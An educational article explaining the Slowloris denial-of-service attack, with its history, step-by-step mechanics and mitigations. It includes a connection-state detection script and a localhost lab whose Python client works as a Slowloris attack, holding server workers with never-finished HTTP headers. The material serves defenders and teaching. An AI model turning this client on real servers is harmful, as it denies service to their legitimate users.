Slowloris Attack

Back in 2009, a series of attacks was carried out against Iranian government websites by hacktivists in the region. The primary technique? Something called a Slowloris attack. Despite the benign-sounding name, a Slowloris attack can be quite effective when deployed properly, and because it looks like ordinary, if sluggish, web traffic, it is not easily picked up by conventional network defenses, which makes it difficult to defend against.

Read on to find out how this simple yet brilliant attack works, and how you can defend against it.


What is a Slowloris Attack?

A Slowloris attack is a type of Denial-of-Service attack that works at the application layer: it exhausts the web server itself rather than the network link. It was created by the security researcher Robert "RSnake" Hansen and is carried out by a piece of software also called Slowloris. The name is derived from the Asian primate; unlike the real slow loris, however, this attack is not adorable. Slowloris allows a single device, such as a personal computer, to take down a web server.

Because it originates from one device, it is strictly a Denial-of-Service rather than a Distributed-Denial-of-Service attack, even though it opens many connections to the target; the same tool run from many hosts at once is what makes it distributed. It does its work without putting any strain on bandwidth, since the traffic volume is tiny. Additionally, it ties up only the targeted web service: other services and ports on the same host keep working, which makes it a very precise attack.

The result is a server put out of commission without a traditional botnet. This makes a Slowloris attack somewhat more attractive to an attacker, as it is not as "loud" as a full-force flood from thousands of zombie machines. Firewalls and rate limiters readily pick up the traffic of script kiddies pointing a botnet at a target without any real technical knowledge; when thousands of malformed packets arrive in, say, a span of 10 minutes, most NetSec professionals will notice.

With a Slowloris attack, however, fewer alarm bells are set off. An IDS (Intrusion Detection System) is much less likely to flag a precision-targeted attack like this one: there are no "malicious" packets in it, just incomplete HTTP requests whose headers never finish, and each connection sends only a line or two at a time, at a relaxed pace, so as not to arouse suspicion. Nothing in any single packet is wrong; the problem only shows up in the aggregate of half-finished connections.
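A detection check for the point above, written as an added example that is not part of the original article: instead of inspecting packets, it looks at the server's open-connection table and counts, per client, connections whose request head is still unfinished after a threshold age. The snapshot is constructed, using documentation-range addresses; real data would come from the server's status page or the host's connection table, and the thresholds are assumptions to tune for your server.

```python
"""Detecting Slowloris from connection state rather than packet content.

Added example, not from the article.  SNAPSHOT is a constructed picture of a
web server's open connections with made-up addresses; in production you would
build the same tuples from the server status page or the connection table.
"""
from collections import defaultdict

# Constructed snapshot: (client_ip, seconds_open, request_head_complete)
SNAPSHOT = [
    ("203.0.113.7", 95, False), ("203.0.113.7", 88, False), ("203.0.113.7", 90, False),
    ("203.0.113.7", 84, False), ("203.0.113.7", 79, False), ("203.0.113.7", 71, False),
    ("198.51.100.20", 1, True), ("198.51.100.20", 3, True),
    ("198.51.100.44", 45, False),   # one slow but honest client on a bad link
    ("192.0.2.9", 2, True),
]


def suspicious_sources(snapshot, min_age=30, min_conns=5):
    """Return {ip: count} for clients holding at least `min_conns` connections
    whose request head is still incomplete after `min_age` seconds.

    A single half-finished request is normal (mobile links, lossy networks);
    many of them from one source, all old, is the Slowloris signature.  The
    thresholds are assumptions: set them below your worker pool size so the
    alert fires before the pool is full.
    """
    half_open = defaultdict(int)
    for ip, age, complete in snapshot:
        if not complete and age >= min_age:
            half_open[ip] += 1
    return {ip: n for ip, n in half_open.items() if n >= min_conns}


if __name__ == "__main__":
    for ip, n in suspicious_sources(SNAPSHOT).items():
        print(f"{ip}: {n} stalled request heads")
```

The lone slow client (198.51.100.44) is deliberately left below the connection threshold: a per-connection rule would either miss the attacker or punish honest users on bad links, which is why the signal has to be counted per source.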

It should be noted that this attack is effective, but it is slow (hence the name). It can take time for the server's pool of connection handlers to fill up with never-finished requests, and the more handlers a server has, or the more servers sit behind a load balancer, the longer that takes. This goes especially for large websites, such as the Iranian government websites in the 2009 attacks.


How Does a Slowloris Attack Work?

  1. An attacker decides on a server to target. Popular servers affected by Slowloris include Apache as well as web servers from Verizon, Flask, and Websense. The common weakness is a limited pool of connection handlers (threads or processes), each of which a single client connection can occupy indefinitely.
  2. The attack begins by sending out partial HTTP requests: a request line and a header or two, but never the blank line that ends the request head.
  3. The HTTP requests never complete, so the server keeps waiting for the rest.
  4. As a result, the targeted server holds a handler open for each of these connections in anticipation of the request completing.
  5. Periodically, the attacker sends one more partial header line on each connection. These headers never complete the request either, but each arrives just before the server's read timeout would expire and resets it, so the connection is never reaped.
  6. Eventually, legitimate connections become impossible. The held-open connections fill the server's connection pool (Apache's MaxClients, renamed MaxRequestWorkers in 2.4), and new clients queue or are refused.
  7. The IDS rarely notices the issue occurring, as the requests are not, at least in theory, malicious: each one is a syntactically valid fragment of HTTP.
  8. Before the Sysadmin or blue team can react, the server is knocked out of commission.

How is a Slowloris Attack Mitigated?

No single setting prevents a Slowloris attack outright, but there are steps one can take to mitigate the threat it poses. One is configuring the server to allow more simultaneous clients (i.e., raising the maximum worker limit), so the attacker needs more connections to fill it. Another is limiting how many concurrent connections a single IP address may hold. Other tactics include shutting down idle or slow connections at a faster rate (a hard deadline for receiving the whole request header, rather than a timeout that resets with every byte received) and requiring a minimum data rate on each connection. In Apache these last two are what mod_reqtimeout's RequestReadTimeout directive provides; in nginx, client_header_timeout bounds the total time a client gets to send its request header.

The way these tactics mitigate a Slowloris attack is fairly simple. They deny the attacker the very conditions they need: without the ability to hold a connection open for a long time with a trickle of bytes, and without numerous simultaneous connections from one source, the attack becomes difficult to pull off.
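The attack steps above and the timeout mitigation, as one runnable lab on localhost. This is an added example, not code from the original article or from RSnake's Slowloris tool: the server is a toy stand-in for a thread-per-connection server such as Apache prefork, and every size, address and timeout (four workers, a 60 s idle timeout, a 1 s header deadline, a 0.3 s trickle interval) is made up for the lab.

```python
"""Slowloris lab on 127.0.0.1: a toy thread-pool HTTP server, a client that
parks its worker slots with never-finished request heads, and a probe that
plays the legitimate user.  Added example, not code from the article or from
the Slowloris tool; all sizes and timeouts are made up for the lab."""
import queue
import socket
import threading
import time
from concurrent.futures import ThreadPoolExecutor

HEAD_END = b"\r\n\r\n"  # the blank line that terminates an HTTP request head
RESPONSE = b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\nConnection: close\r\n\r\nok"


def serve(ready, workers, idle_timeout, head_deadline, stop):
    """Accept loop feeding `workers` handler threads (think MaxRequestWorkers).
    idle_timeout : seconds to wait for the *next* byte; every byte resets it,
                   which is exactly the behaviour Slowloris exploits.
    head_deadline: optional cap on the total time the request head may take
                   (the mod_reqtimeout idea); a trickle of bytes cannot extend it."""
    def handle(conn):
        start, buf = time.monotonic(), b""
        try:
            while HEAD_END not in buf:
                wait = idle_timeout
                if head_deadline is not None:
                    wait = min(wait, head_deadline - (time.monotonic() - start))
                    if wait <= 0:
                        return              # head took too long: evict, free the slot
                conn.settimeout(wait)
                chunk = conn.recv(4096)
                if not chunk:
                    return                  # peer closed
                buf += chunk
            conn.sendall(RESPONSE)
        except OSError:
            pass                            # timeout or reset: the slot is freed either way
        finally:
            conn.close()

    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))              # ephemeral port, handed back via `ready`
    srv.listen(128)
    srv.settimeout(0.1)
    ready.put(srv.getsockname()[1])
    with ThreadPoolExecutor(workers) as pool:
        while not stop.is_set():
            try:
                pool.submit(handle, srv.accept()[0])
            except socket.timeout:
                continue
    srv.close()


def slowloris(port, n_conns, keepalive, stop):
    """Steps 2-5 of the article: open n_conns sockets, send a request line and
    a header on each but never the blank line, then add one bogus header every
    `keepalive` seconds so an idle timeout never fires.  Unlike the real tool,
    this lab client does not reopen sockets the server has dropped."""
    socks = [socket.create_connection(("127.0.0.1", port)) for _ in range(n_conns)]
    for s in socks:
        s.sendall(b"GET / HTTP/1.1\r\nHost: lab.example\r\nUser-Agent: slowlab\r\n")
    while not stop.wait(keepalive):
        for s in socks:
            try:
                s.sendall(b"X-a: b\r\n")    # one more header line, head still unfinished
            except OSError:
                pass                        # server already evicted this one
    for s in socks:
        s.close()


def probe(port, timeout):
    """The legitimate user: a complete request; True if answered within `timeout` s."""
    try:
        with socket.create_connection(("127.0.0.1", port), timeout=timeout) as s:
            s.sendall(b"GET / HTTP/1.1\r\nHost: lab.example\r\n\r\n")
            return s.recv(1024).startswith(b"HTTP/1.1 200")
    except OSError:                         # includes socket.timeout
        return False


def run_lab(workers=4, idle_timeout=60.0, head_deadline=None, probe_timeout=2.0):
    """Start a server, park every worker slot with Slowloris, then report
    whether a legitimate request still gets through (True) or starves (False)."""
    ready, stop = queue.Queue(), threading.Event()
    srv = threading.Thread(target=serve, args=(ready, workers, idle_timeout, head_deadline, stop))
    srv.start()
    port = ready.get(timeout=5)
    atk = threading.Thread(target=slowloris, args=(port, workers, 0.3, stop))
    atk.start()
    time.sleep(0.5)                         # let the attacker occupy all slots
    served = probe(port, probe_timeout)
    stop.set()
    atk.join()
    srv.join()
    return served


if __name__ == "__main__":
    print("idle timeout only (vulnerable):", run_lab())
    print("1 s head deadline (hardened):  ", run_lab(head_deadline=1.0))
```

The vulnerable run models a per-read timeout that any trickle of bytes resets, which is the condition Slowloris needs; the legitimate probe queues behind four parked slots and gives up. The hardened run caps the total time a request head may take, so the trickle no longer helps and the slots are reclaimed within a second. Because the lab client does not reopen evicted sockets while the real tool does, a header deadline is paired in practice with a per-source connection cap; that cap cannot be demonstrated here, where attacker and probe both arrive from 127.0.0.1.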

This is not a bulletproof plan, as the attack can still be attempted; an attacker with many source addresses, time and patience can still push a thread-per-connection server toward its limits. There are still more methods one can try, however, such as firewall rules that cap connections and connection rates per source, and a reverse proxy or load balancer in front of the server. Event-driven proxies such as nginx do not dedicate a worker to each connection and so shrug off the basic attack, but they have their own limits (connection counts, file descriptors, their own header timeouts) and cannot entirely prevent a Slowloris attack.
